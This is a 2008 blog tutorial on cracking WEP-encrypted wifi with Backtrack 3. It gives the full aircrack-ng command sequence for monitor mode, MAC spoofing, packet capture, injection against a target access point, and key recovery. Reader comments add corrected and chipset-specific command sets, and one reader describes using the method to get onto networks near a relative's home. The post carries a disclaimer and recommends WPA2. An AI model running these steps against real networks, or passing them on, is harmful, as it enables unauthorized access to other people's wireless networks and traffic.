Whats the w0rd?

Bringing you the w0rd from the virtual streets

Aug

Tutorial: Cracking WEP Using Backtrack 3

Author: Maz Writing about: Hacking, How To, Informational, Technology, Tips and Tricks, lifehacking, mobile, software, technical support, tutorial

« affliction

correspondence »

Standard Disclaimer: This article is provided for informational purposes only. thew0rd.com and its affiliates accept no liability for providing this information. Please only use to test configurations on your own equipment. Accessing WIFI networks that do not belong to you is ILLEGAL.

This article will explan how to crack 64bit and 128bit WEP on many WIFI access points and routers using Backtrack, a live linux distribution. Your mileage may very. The basic theory is that we want to connect to an Access Point using WEP Encryption, but we do not know the key. We will attack the wifi router, making it generate packets for our cracking effort, finally cracking the WEP key. I have tested this technique on an IBM Thinkpad x60 and Acer 5672 and the WIFI Chipset in those machines work for sure.

Requirements:

Backtrack 3 on CD or USB
Computer with compatible 802.11 wireless card
Wireless Access point or WIFI Router using WEP encryption

I will assume that you have downloaded and booted into Backtrack 3. If you haven’t figured that part out, you probably shouldn’t be trying to crack WEP keys. Once Backtrack is loaded, open a shell and do the following:

Preparing The WIFI Card

First we must enable “Monitor Mode” on the wifi card. If using the Intel® PRO/Wireless 3945ABG chipset issue the following commands:

modprobe -r iwl3945

modprobe ipwraw
The above commands will enable monitor mode on the wireless chipset in your computer. Next we must stop your WIFI card:

iwconfig
Take note of your wireless adapter’s interface name. Then stop the adapter by issuing:

airmon-ng stop [device]
Then:

ifconfig down [interface]
Now we must change the MAC address of the adapter:

macchanger --mac 00:11:22:33:44:66 [device]
Its now time to start the card in monitor mode by doing:

airmon-ng start [device]

Attacking The Target

It is now time to locate a suitable WEP enabled network to work with:

airodump-ng [device]

Be sure to note the MAC address (BSSID), channel (CH) and name (ESSID) of the target network. Now we must start collecting data from the WIFI access point for the attack:

airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]

The above command will output data collected to the file: network.out. This file will be fed into the WEP Crack program when we are ready to crack the WEP key.

Open another shell and leave the previous command running. Now we need to generate some fake packets to the access point to speed up the data output. Test the access point by issuing the following command:

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]

If this command is successful we will now generate many packets on the target network so that we can crack the KEY. Type:

airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]

This will force the access point to send out a bunch of packets which we can then use to crack the WEP key. Check your aerodump-ng shell and you should see the “data” section filling up with packets.

After about 10,000-20,000 you can begin cracking the WEP key. If there are no other hosts on the target access point generating packets, you can try:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]

Once you have enough packets, you begin the crack:

aircrack-ng -n 128 -b [bssid] [filename]-01.cap

The “-n 128″ signifies a 128-bit WEP key. If cracking fails, try a 64-bit key by changing the value of N to 64.

Once the crack is successful you will be left with the KEY! Remove the : from the output and there is your key. So there you have it.

You can use these techniques to demonstrate to others why using WEP is a bad idea. I suggest you use WPA2 encryption on your wireless networks. Goodluck!

« affliction

correspondence »

Technorati : View blog reactions

Similiar Topics

How To Install Windows XP Pro on the ASUS EEE PC 1000H (October 14th, 2008)
The Last HOPE Wrap-Up (July 24th, 2008)
HOPE This Weekend in NYC (July 18th, 2008)
Defcon 15 News Round-Up (August 6th, 2007)

37 Users Responsed To " Tutorial: Cracking WEP Using Backtrack 3 "

Subsribes to this topic Comment RSS or TrackBack URL

Emrikol said,

8-20-2008 in 07:40:04 at 165.139.0.20

Thanks Maz! You’re a lifesaver. I spent a while trying to do this with russix and I couldn’t get it. (Crazy mother-in-law is too cheap to buy internet, she moved, and her new place only has encrypted signals…luckily WEP)

Anon said,

8-21-2008 in 12:30:30 at 123.222.97.173

or you could just buy your web access and not be fucking people over for bandwidth etc.

nico said,

8-21-2008 in 21:20:52 at 76.121.109.166

Good tut. Next you might want to share with your readers about packet injection and Kismet for sniffing. I don’t know if they bundle Kismet with BT3 now but I know it was in BT2. Thanks

Registered99 said,

8-22-2008 in 13:52:32 at 67.8.114.113

There is no macconfig?
macconfig: command not found

Maz said,

8-22-2008 in 14:12:59 at 64.52.32.138

@Registered99 Thanks for pointing out the mistake, the actual command is macchanger and I’m updating the post as I write this. Goodluck!

dubpluris said,

8-22-2008 in 14:42:34 at 76.169.72.163

Thanks a lot. I don’t really even plan on using this, but it was very informative and clear. Thanks for the effort.

keen said,

8-22-2008 in 15:06:36 at 72.138.72.112

I personally do not worry if someone hack into my route go online. What worry me are when the intentions are further, break into my desktop or use my connection do bad things which would got me a surprise knock on the door by FBI. This is a darn good reason I remain connect with troublesome hard wired or the stick to old router b version.

justgeig said,

8-24-2008 in 00:52:00 at 67.236.135.19

just wondering what are your thoughts on hiding/not broadcasting the SSID…decently secure or no?

Maz said,

8-24-2008 in 02:44:18 at 75.222.163.109

@justgeig if there are active clients on an AP with a hidden SSID, you can usually see it when running airodump-ng by comparing the MAC of the hidden AP with the MAC on packet captures. So generally, it doesn’t offer much more security. Might just be a speed bump in some situations.

JodoKaast said,

8-27-2008 in 15:12:12 at 67.171.68.60

aircrack-ng also has the PTW algorithm attack, which needs far less IVs to successfully decrypt a WEP key. You can invoke it using the ‘-z’ switch with aircrack-ng. I’ve cracked a 128-bit WEP key with only about 40000 IVs.

Nick said,

8-29-2008 in 10:01:54 at 81.215.117.146

i have done exactly as you told my wifi chipset is Intel® PRO/Wireless 3945ABG.

problem is after i use

airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]

i get no packets from my access point. then i use:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]

after this i get many packets but like 50000 packets has only 1 IV.

the access point im testing on is Dynalink_Datron.

Hope someone can help

jones said,

9-5-2008 in 02:35:27 at 24.28.254.73

Having trouble cracking wep key at my house. After performing this command aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device] the output for dest mac is ff:ff:ff:ff:ff:ff, but according to your tutorial the dest mac is the fake mac. So when I try to decrypt the packets it fails looking for keys and says try with 5000 IVs

Maz said,

9-5-2008 in 09:01:26 at 64.52.32.138

@jones hey, check out the following site for more information about Interactive Packet Replay: http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

Hopefully that will give you a little more background and assist you in your efforts. Goodluck!

Goatse said,

9-7-2008 in 19:40:43 at 70.82.182.92

great tutorial, scary

moosacha said,

9-11-2008 in 14:21:07 at 166.197.149.121

“aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]”

If you use interactive packet replay, wouldn’t you need to capture a lot more than just 20,000 packets in order to successfully attempt to crack? As far as I know what you’ll be capturing wont be ARP packets, so the PWT method will not work for you. You’ll probably need to capture about 1,500,000 IVS before having a good chance of getting the key. Or am I mistaken?

josh said,

9-12-2008 in 07:29:11 at 211.30.243.184

hey greeat tut just one question when i run the
ifconfig down [wifi0] command i get error something like interface not found, but when i run airmon-ng stop [device] it says interface is wifi0 so im pretty sure its the wright interface, btw interface and device are the same thing on my machine. oh and last thing how do you get out of monitor mode?

croakey said,

9-18-2008 in 18:56:19 at 71.204.75.214

This tutorial is wonderful and worked for me!

This line however needed the following changes to work for me.

before:
airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]

after:
airodump-ng -c [channel] -w [network.out] -–bssid [bssid] [device]

browncardboard said,

9-30-2008 in 08:12:41 at 68.163.213.110

great tutorial! what would needed to be modified in the code to get it to work with an atheros chipset?

i cant quite figure it out

browncardboard said,

9-30-2008 in 20:30:46 at 32.142.88.178

for atheros based chipsets use ath_pci in place of the numbers for the modprobe command. I also had to remove the -r to get it to load- BUT I have no idea what I’m doing yet

Hope this helps someone

browncardboard said,

10-6-2008 in 17:38:16 at 98.216.15.38

this tutorial helped me alot - at was the basis for me learning bt3. However Some of the above post did not work for me. I am using an Atheros chipset, and some things had to be changed. Hope this helps some one

modprobe ath_pci

modprobe ipwraw

iwconfig

airmon-ng stop ath0

ifconfig wifi0 down

macchanger –mac 00:11:22:33:44:66 wifi0

airmon-ng start wifi0

airodump-ng ath0
gives available routers

******** cd /mnt/hda2/
can do this to change the place to save the data
airodump-ng -c 6 -w network.out –bssid 00:21:21:21:21:21 ath0
collects shit

aireplay-ng -1 0 -a 00:21:21:21:21:21 -h 00:11:22:33:44:66 -e smokers suck ath0
must play around with this to get it on the same channel
should get:
15:56:18 Association successful :-) (AID: 1)

aireplay-ng -3 -b 00:21:21:21:21:21 -h 00:11:22:33:44:66 ath0

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:21:21:21:21:21 -h 00:11:22:33:44:66 ath0

cd /mnt/hda2 <- Used this to re-locate to the directory with the file
aircrack-ng -n 128 -b 00:21:21:21:21:21 network.out-01.cap

digitalfear said,

10-13-2008 in 03:25:16 at 213.207.81.210

can ill use my wifi wireless network kaart that in my laptop ??

Nedad said,

10-13-2008 in 06:38:04 at 212.27.27.187

Hi there

I am new to Wifi and linux. I have just been on amazone to order books so I can read about linux. They will be here in some days, but I can’t wait for some days.

I im trying this tutorial and I get an error:
bt ~ # modprobe -r iwl4965
bt ~ # modprobe ipwraw
bt ~ # iwconfig
lo no wireless extensions.

eth0 no wireless extensions.

bt ~ #

If I run “modprobe -r iwl4965″ then iwcanfic can’t find my wireless adapter and I can’t fint the interface name.

What do I miss here or doing wrong?

Thanks
Nedad

Guest said,

10-18-2008 in 11:14:42 at 70.131.100.196

Take note of your wireless adapter’s interface name. Then stop the adapter by issuing:

airmon-ng down [interface]

what is the interface
i all i can find is the divice name.

i get the error ‘host name lookup failure’

i think this is why my #data is staying at zero and beacon is at like 30000

Guest said,

10-18-2008 in 19:46:44 at 70.131.100.196

i got it all working i cant active attack, thanks for the great tutorial

tuborg3110 said,

10-19-2008 in 17:47:14 at 92.37.126.74

great tut. i have also question, or 3 problems? 1.)well after this step : aireplay-ng -3 -b bssid -h 00:11:22:33:44:55 (device) there is a lot of read packets (100 000), but there is no ARP and ACKs requests, and data is 0, or just a few maybe 3 or 4 or 4 etc.
so what’s problem?
2)also, a lot of times this step don’t work: aireplay-ng -10 -a bssid -h 00:11:22:33:44:55 -e essid (device), after that there is no Authentication successful and Association successful. 3.problem is next. after this aireplay-ng -3 -b bssid -h 00:11:22:33:44:55 (device), there is no ARP and ACKs so, with another laptop i tried to connect on the same secure network, and then started ARP and ACK..but there is no data rising, only when i tried to conect with another laptop, then data rising, but when i stop, also Data stops. and after maybe 50 000 od IV’s i can’t crack becouse that+s not enough of IV’s. have you any solution what can i do?

tuborg3110 said,

10-19-2008 in 17:54:28 at 92.37.126.74

one more thing- there is no problem with wirelles card, becouse, i tried with 5 different!!

Talha said,

10-20-2008 in 13:32:28 at 91.140.219.157

how to increase the speed of injecting packets ??
the #data colums doesnt rise very fast after injecting packets … it would take around 4 hours to rise to about 10000 packets…how to make it risee faster ??

i am using an intel3495 card ….

XxLIL_NOYXX said,

11-15-2008 in 20:20:01 at 71.237.166.148

im getting a msg saying

Fwrite(packet data) failed no more space on device
fwrite(packet filter) failed no more space on device

while collecting packets after while it will corrupt packets collected???.. help how do i relocate where data is sent??

guest said,

11-16-2008 in 08:15:03 at 121.97.212.45

Can i run BackTrack 3 in windows Vista? please tell me how. Thanks.

Maz said,

11-16-2008 in 13:26:17 at 208.120.217.126

@guest no. And the fact that you asked that question really shows how little you know. You should search google, read, and learn more about what an operating system is and other computer basics before you try to go and crack WEP. You are obviously not going to crack WEP for any legitimate security purpose.

nomoss said,

11-18-2008 in 17:42:55 at 151.196.179.195

Nice job on the tutorial. I am having some trouble with the airmon-ng and airodump-ng. The apps start but are not finding any data and seem unstable. The first few times they did find some networks. But now they don’t find anything. I have the same Centrino wireless card cited in the tutorial. Kismet is working fine and finding many networks. Any help would be appreciated. Z.

Ross (Software Developer) said,

11-21-2008 in 06:38:32 at 195.149.28.208

Nice tutorial. Have tried this before but my Laptop’s wireless card is not compatible. Will be purchasing a new card soon as this is a neat trick to show our clients.

blahhh2 said,

11-21-2008 in 07:07:44 at 85.137.208.67

For all of you people asking about ifconfig, it’s not

ifconfig down [interface]

ifconfig [interface] down

have a good day ;)

Technorati : View blog reactions

Trackbacks & Pingbacks

Cracking WEP Using Backtrack 3 | What Is Wrong With The World Today mention,

8-22-2008 at 12:45:15 ping from 208.179.83.35

[...] You can use these techniques to demonstrate to others why using WEP is a bad idea. I suggest you use WPA2 encryption on your wireless networks. Goodluck! From: http://thew0rd.com/2008/08/19/tutorial-cracking-wep-using-backtrack-3/ [...]

Web Sites of Interest » links for 2008-08-24 mention,

8-24-2008 at 08:30:36 ping from 74.220.207.84

[...] Tutorial: Cracking WEP Using Backtrack 3 | Whats the w0rd? (tags: linux wireless wifi wep hacks hacking cracks cracking) [...]

KoreK chopchop, Kismet, Gateway Ubuntu | Remote Security mention,

10-11-2008 at 14:34:49 ping from 82.119.226.56

[...] Tutorial with pictures for ipw3945 & Backtrack you can check at here. [...]

Como crackear el cifrado WEP usando Backtrack 3 | El weblog de Skatox mention,

10-12-2008 at 21:43:06 ping from 75.125.208.146

[...] http://thew0rd.com/2008/08/19/tutorial-cracking-wep-using-backtrack-3/ [...]